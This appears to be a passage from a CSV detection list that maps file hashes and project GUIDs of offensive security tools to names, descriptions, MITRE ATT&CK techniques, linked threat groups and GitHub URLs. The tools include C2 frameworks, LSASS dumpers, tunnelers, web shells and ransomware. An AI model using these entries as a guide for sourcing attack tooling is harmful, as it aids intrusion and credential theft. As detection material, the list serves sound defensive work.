"*e443f79a4b00598ac5a5adc8826b605db24b6345ae1fb4180aa4f173152fffc0*",".{0,1000}e443f79a4b00598ac5a5adc8826b605db24b6345ae1fb4180aa4f173152fffc0.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42033"
"*e4501ae5fc883efc3f0491b2d277e76fbb6d5b4d6618a2221d9fe08e8af41d00*",".{0,1000}e4501ae5fc883efc3f0491b2d277e76fbb6d5b4d6618a2221d9fe08e8af41d00.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42034"
"*e45bf8db8dd20bb90ec257016dbe93831b8adbf13b1eb7d4eac496b895b3eddb*",".{0,1000}e45bf8db8dd20bb90ec257016dbe93831b8adbf13b1eb7d4eac496b895b3eddb.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42035"
"*e45f0bbbeee0fc901b50a0034dbeee8a1f2fe8b60ac58309580b3f7659dd9784*",".{0,1000}e45f0bbbeee0fc901b50a0034dbeee8a1f2fe8b60ac58309580b3f7659dd9784.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42037"
"*e46766c1c80ea172d9c38d7d18674d29d9fd294014cf9d8e9557a6b2b3755a77*",".{0,1000}e46766c1c80ea172d9c38d7d18674d29d9fd294014cf9d8e9557a6b2b3755a77.{0,1000}","offensive_tool_keyword","Argus","Information Gathering Toolkit","T1590.001 - T1590.002 - T1595.003 - T1016 - T1046 - T1590.005","TA0043 - TA0007","N/A","N/A","Reconnaissance","https://github.com/jasonxtn/Argus","1","0","#filehash","N/A","4","10","1951","210","2024-10-08T19:04:27Z","2024-10-01T22:13:51Z","42038"
"*e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6*",".{0,1000}e46777e5f1ac1652db3ce72dd0a2475ea515b37a737fffd743126772525a47e6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42039"
"*e470b90efe8da89e3c118eea1d62eea1f4f0194d82522c7dfb2a07d24471566a*",".{0,1000}e470b90efe8da89e3c118eea1d62eea1f4f0194d82522c7dfb2a07d24471566a.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","42040"
"*e475c6f8ad8471fe068b1cbce42300ecffb7e6825ba88bf7dff8c2969562f595*",".{0,1000}e475c6f8ad8471fe068b1cbce42300ecffb7e6825ba88bf7dff8c2969562f595.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42041"
"*e47c1d1be0e70b9496873b1b78c7c185320358fa94cd8083e09931de1d82d2ec*",".{0,1000}e47c1d1be0e70b9496873b1b78c7c185320358fa94cd8083e09931de1d82d2ec.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42042"
"*e47e58d3e21fb5608f890f81474a0354f42d97018d930d93b07fd83ac5c0e5a6*",".{0,1000}e47e58d3e21fb5608f890f81474a0354f42d97018d930d93b07fd83ac5c0e5a6.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42043"
"*e4865da7718ce53f800a8a5990b5e3dfccb1350c9ec3831b3fc8c785d7c1bb2e*",".{0,1000}e4865da7718ce53f800a8a5990b5e3dfccb1350c9ec3831b3fc8c785d7c1bb2e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42044"
"*e48d5d119ea5afc1586810a87475e8e16e0c7bf21af747ec77396f27ff5ad21a*",".{0,1000}e48d5d119ea5afc1586810a87475e8e16e0c7bf21af747ec77396f27ff5ad21a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42045"
"*e48ef8fb95668ad11567f9ed959552466b9fbc796fe8380b312a5d165843048d*",".{0,1000}e48ef8fb95668ad11567f9ed959552466b9fbc796fe8380b312a5d165843048d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","42046"
"*e497cb13af9ca67fe13e37a81dc416d7cff819402aa46a7232c088e06dc74f92*",".{0,1000}e497cb13af9ca67fe13e37a81dc416d7cff819402aa46a7232c088e06dc74f92.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42048"
"*e49b696f9356d17861fb7ff0391a72841af546a18b1be587cf0d41dbdac982a4*",".{0,1000}e49b696f9356d17861fb7ff0391a72841af546a18b1be587cf0d41dbdac982a4.{0,1000}","offensive_tool_keyword","ZeroHVCI","Achieve arbitrary kernel read/writes/function calling in Hypervisor-Protected Code Integrity (HVCI) protected environments calling without admin permissions or kernel drivers - CVE-2024-26229","T1068 - T1564 - T1014 - T1499","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zer0condition/ZeroHVCI","1","0","#filehash","N/A","7","2","198","43","2024-10-26T17:08:38Z","2024-07-20T07:29:18Z","42050"
"*e49c11f8f47b6fe4c3810ad8b5a241638983d7e60d240f70859fd4b7a887c4d6*",".{0,1000}e49c11f8f47b6fe4c3810ad8b5a241638983d7e60d240f70859fd4b7a887c4d6.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","42051"
"*e4ae0aec069aa237c5408c25c838464a65f7ca4e87453e6191f0629909fb2dfa*",".{0,1000}e4ae0aec069aa237c5408c25c838464a65f7ca4e87453e6191f0629909fb2dfa.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","42053"
"*e4b3511a69efba9f59592c41a87992f7e23fb6ea45d18eca6ab19bbbb7bb6d6f*",".{0,1000}e4b3511a69efba9f59592c41a87992f7e23fb6ea45d18eca6ab19bbbb7bb6d6f.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","42054"
"*e4b3b3e72bd3bf4052a3136cb811ea54923bc2d7807709992e0345743d49ced8*",".{0,1000}e4b3b3e72bd3bf4052a3136cb811ea54923bc2d7807709992e0345743d49ced8.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42055"
"*e4b3bf84caac8fcf5055b237a3054181c1f6c6d726317e028dcacdaeea0c9e60*",".{0,1000}e4b3bf84caac8fcf5055b237a3054181c1f6c6d726317e028dcacdaeea0c9e60.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","42056"
"*e4b84fd04cf067c5bdcab91f85599ab53671d9eda16a60590886824b8b5e7cab*",".{0,1000}e4b84fd04cf067c5bdcab91f85599ab53671d9eda16a60590886824b8b5e7cab.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","42059"
"*e4bc4fc4b8f65caedc7302900804da6af5689a7f3a03b31ae62433b24f393568*",".{0,1000}e4bc4fc4b8f65caedc7302900804da6af5689a7f3a03b31ae62433b24f393568.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#filehash","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","42060"
"*e4c23b8fe00672ae95277e683f870456debe246e506a7ff47c92c1881c5c7622*",".{0,1000}e4c23b8fe00672ae95277e683f870456debe246e506a7ff47c92c1881c5c7622.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","42063"
"*e4c4d0282728171ce3f6cd35a92e8cb1ecd95635331b146105f5c81a25ac9c0c*",".{0,1000}e4c4d0282728171ce3f6cd35a92e8cb1ecd95635331b146105f5c81a25ac9c0c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","42065"
"*e4ce017fd52b2dab10d33e9fbe51dcb8e5b74b496121d8d121d228d5fbdb58e8*",".{0,1000}e4ce017fd52b2dab10d33e9fbe51dcb8e5b74b496121d8d121d228d5fbdb58e8.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","#filehash","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","42067"
"*e4cfb74b6002861358363025a31d0dd682a1cb67149d6608825f63fe46d01c38*",".{0,1000}e4cfb74b6002861358363025a31d0dd682a1cb67149d6608825f63fe46d01c38.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","42068"
"*e4d3d57f4de0497d24095cbd83d5500268323e247e4de2e69cd704975b134678*",".{0,1000}e4d3d57f4de0497d24095cbd83d5500268323e247e4de2e69cd704975b134678.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42070"
"*e4d484d9bac7434247fff0c298b8af6b681fa6b140b573d8ce78b1f3bed94e6b*",".{0,1000}e4d484d9bac7434247fff0c298b8af6b681fa6b140b573d8ce78b1f3bed94e6b.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","0","#filehash","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","42071"
"*E4D9EF39-0FCE-4573-978B-ABF8DF6AEC23*",".{0,1000}E4D9EF39\-0FCE\-4573\-978B\-ABF8DF6AEC23.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","#GUIDproject","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","42072"
"*e4df5a904c8eb505cb63d9905c398f632cf97ba193a6e25569d561d44f69e623*",".{0,1000}e4df5a904c8eb505cb63d9905c398f632cf97ba193a6e25569d561d44f69e623.{0,1000}","offensive_tool_keyword","nullinux","Internal penetration testing tool for Linux that can be used to enumerate OS information/domain information/ shares/ directories and users through SMB.","T1087 - T1016 - T1077 - T1018","TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/m8sec/nullinux","1","0","#filehash #linux","N/A","7","6","575","101","2024-06-19T14:29:09Z","2016-04-28T16:45:02Z","42073"
"*e4ed972586dead9a986aaec11cf76e5e044549b69b2fb9bbf5a685f281997bc8*",".{0,1000}e4ed972586dead9a986aaec11cf76e5e044549b69b2fb9bbf5a685f281997bc8.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","42075"
"*e4f24bd9724afff4200cf4c57eeb2ba37b9bf99b7add53ce1262e2e98c80a812*",".{0,1000}e4f24bd9724afff4200cf4c57eeb2ba37b9bf99b7add53ce1262e2e98c80a812.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","42076"
"*e4f33ee9ba4d86685f8df4a89e192a354139edcf*",".{0,1000}e4f33ee9ba4d86685f8df4a89e192a354139edcf.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","42077"
"*e4fa7af0b270b4729602f6d8d41d564ce21d805c4a43e826483ba7761acd3a4e*",".{0,1000}e4fa7af0b270b4729602f6d8d41d564ce21d805c4a43e826483ba7761acd3a4e.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","42078"
"*e4fef08ac954c5787ff0c72defb9a496d030509dd2eca2afc6ef2d9c669cca71*",".{0,1000}e4fef08ac954c5787ff0c72defb9a496d030509dd2eca2afc6ef2d9c669cca71.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","0","#filehash","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","42079"
"*e50686bb739ce69050f960b06ec6dcdbd4a7bfe8c0a08abbe9b9cac45f04d787*",".{0,1000}e50686bb739ce69050f960b06ec6dcdbd4a7bfe8c0a08abbe9b9cac45f04d787.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","42080"
"*e50bd0143399ca09e3a293f2546cdacb0bf093294dda39263474ed55d8e1743d*",".{0,1000}e50bd0143399ca09e3a293f2546cdacb0bf093294dda39263474ed55d8e1743d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","42081"
"*e50c620c59b9a402d924b65695c6ee723cf10bbf65c542416888776f3b58282f*",".{0,1000}e50c620c59b9a402d924b65695c6ee723cf10bbf65c542416888776f3b58282f.{0,1000}","offensive_tool_keyword","Checkmate","payload Execution by Fake Windows SmartScreen with requires Administrator privileges & Turn off real SmartScreen Filter","T1059 - T1070 - T1546","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/S3N4T0R-0X0/Checkmate","1","0","#filehash","N/A","9","1","95","16","2024-01-12T19:03:45Z","2024-01-04T15:56:37Z","42082"
"*e5139e7b40768b3a2a6be05138cd8c5cd5fc71eb60b108e0743077f0e4df3a4d*",".{0,1000}e5139e7b40768b3a2a6be05138cd8c5cd5fc71eb60b108e0743077f0e4df3a4d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","42083"
"*E51B9AEB-5F48-4C5C-837E-3A2743917427*",".{0,1000}E51B9AEB\-5F48\-4C5C\-837E\-3A2743917427.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","#GUIDproject","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","42085"
"*e51e4cf322780a163acaa6e3f0b2e04a69f071a2295231b8f4fe07e6977acf24*",".{0,1000}e51e4cf322780a163acaa6e3f0b2e04a69f071a2295231b8f4fe07e6977acf24.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","42088"
"*e5285e73892bee5dd811a25cc0f2848fbe995c0aebfa2fd4ac533a8f2a619cec*",".{0,1000}e5285e73892bee5dd811a25cc0f2848fbe995c0aebfa2fd4ac533a8f2a619cec.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","42089"
"*e52b09300e5f48a7584601a8c576ab946e4818156e40d355d36d087906bb66d1*",".{0,1000}e52b09300e5f48a7584601a8c576ab946e4818156e40d355d36d087906bb66d1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","42090"
"*e52f7c5cdfbcfd07c3af1a5d4b192e804f2a29cc1cacff6573ad701cbeb8440a*",".{0,1000}e52f7c5cdfbcfd07c3af1a5d4b192e804f2a29cc1cacff6573ad701cbeb8440a.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","#filehash","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","42091"
"*e532449171a8fb15657347c2b6df8391c93227af3fb386011a4e8b40d780ad24*",".{0,1000}e532449171a8fb15657347c2b6df8391c93227af3fb386011a4e8b40d780ad24.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","42092"
"*e53c37e94cfa66023839a9db008e7953f524db0dd6b5f1a467f1a55827aa63df*",".{0,1000}e53c37e94cfa66023839a9db008e7953f524db0dd6b5f1a467f1a55827aa63df.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","42094"
"*e53f158d-8aa2-8c53-da89-ab75d32c8c01*",".{0,1000}e53f158d\-8aa2\-8c53\-da89\-ab75d32c8c01.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#GUIDproject","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","42095"
"*E54195F0-060C-4B24-98F2-AD9FB5351045*",".{0,1000}E54195F0\-060C\-4B24\-98F2\-AD9FB5351045.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","Black Basta","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","#GUIDproject","N/A","10","4","327","37","2025-02-05T15:24:52Z","2023-09-13T11:28:51Z","42096"
"*e54299149f25b882cb0900a2977eb6d72a4fa88fb96b67b370981b42b66d7733*",".{0,1000}e54299149f25b882cb0900a2977eb6d72a4fa88fb96b67b370981b42b66d7733.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","42097"
"*e542e94c43340357ded227e309c20e1e03505295a8dba216781f2976ff29c449*",".{0,1000}e542e94c43340357ded227e309c20e1e03505295a8dba216781f2976ff29c449.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","42098"
